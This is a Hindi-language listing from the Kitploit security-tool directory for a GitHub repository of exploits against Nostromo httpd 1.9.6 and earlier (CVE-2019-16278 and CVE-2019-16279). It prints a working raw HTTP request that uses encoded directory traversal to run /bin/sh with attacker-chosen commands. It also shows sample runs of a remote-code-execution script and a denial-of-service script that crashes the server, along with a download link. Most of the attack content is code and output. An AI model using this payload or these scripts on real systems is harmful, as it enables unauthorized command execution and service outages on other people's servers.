Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-16278 — डायरेक्टरी ट्रैवर्सल से रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/jas502n/cve-2019-16278
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणरिमोट एक्सेस टूल
GitHubjas502n/cve-2019-16278

CVE-2019-16278

डायरेक्टरी ट्रैवर्सल से रिमोट कोड निष्पादन

रिपॉजिटरी देखें
702726 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-16278 और CVE-2019-16279 के लिए एक्सप्लॉइट्स

Nostromo httpd, संस्करण <= 1.9.6 के लिए 2 गंभीर कमजोरियों से ग्रस्त है (0day =]) पहली एक डायरेक्टरी ट्रैवर्सल के माध्यम से RCE है, दूसरी एक DoS है

CVE-2019-16278 - डायरेक्टरी ट्रैवर्सल से रिमोट कोड निष्पादन

root@kitploit:~
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25

echo
echo
ifconfig 2>&1

यह बग CVE-2011-0751 के अधूरे फिक्स के कारण है। हम /../ की जाँच को बायपास कर सकते हैं, जो हमें मनमाने तर्कों के साथ /bin/sh निष्पादित करने की अनुमति देता है।

उदाहरण

root@kitploit:~
$ ./CVE-2019-16278.sh 127.0.0.1 8080 id
uid=1001(sp0re) gid=1001(sp0re) groups=1001(sp0re)

CVE-2019-16279 - डिनायल ऑफ सर्विस

यह बग एक ही कनेक्शन में बहुत सारे \r\n भेजने पर मेमोरी त्रुटि उत्पन्न करता है।

उदाहरण

root@kitploit:~
$ curl http://127.0.0.1:8080
HELLO!
$ ./CVE-2019-16279.sh 127.0.0.1 8080
$ curl http://127.0.0.1:8080
curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused

संदर्भ लिंक:

https://git.sp0re.sh/sp0re/Nhttpd-exploits

टूल डाउनलोड करें